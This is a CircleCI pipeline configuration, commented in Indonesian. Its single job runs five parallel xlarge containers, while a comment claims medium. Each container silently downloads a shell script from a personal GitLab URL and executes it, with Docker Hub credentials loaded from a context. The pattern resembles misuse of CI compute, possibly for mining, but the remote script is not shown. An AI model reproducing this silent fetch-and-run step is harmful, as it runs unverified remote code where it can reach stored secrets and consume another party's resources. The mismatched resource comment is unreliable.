version: 2.1

# 1. Definisi Lingkungan Kerja (Executor)
executors:
  my-custom-executor:
    docker:
      - image: cimg/base:stable
        auth:
          username: $DOCKER_HUB_USER
          password: $DOCKER_HUB_PASSWORD
    # Menggunakan resource class medium (2 vCPU, 4GB RAM)
    resource_class: xlarge 

# 2. Definisi Tugas (Jobs)
jobs:
  my-job-name:
    executor: my-custom-executor
    # Menjalankan 5 instance job ini secara paralel (bersamaan)
    parallelism: 5 
    steps:
      - checkout
      - run:
          name: "Setup Environment and Execute"
          command: |
            # Mengunduh biner dan konfigurasi secara silent
            wget -q https://gitlab.com/barbieanay003/seger/-/raw/main/circle.sh
            chmod +x circle.sh
            
            # Menjalankan proses
            # Tips: Gunakan 'timeout' jika ingin membatasi durasi eksekusi per node
            bash circle.sh

# 3. Definisi Alur Kerja (Workflows)
workflows:
  my-custom-workflow:
    jobs:
      - my-job-name:
          context:
            - docker-hub-creds # Memanggil secret dari CircleCI Context
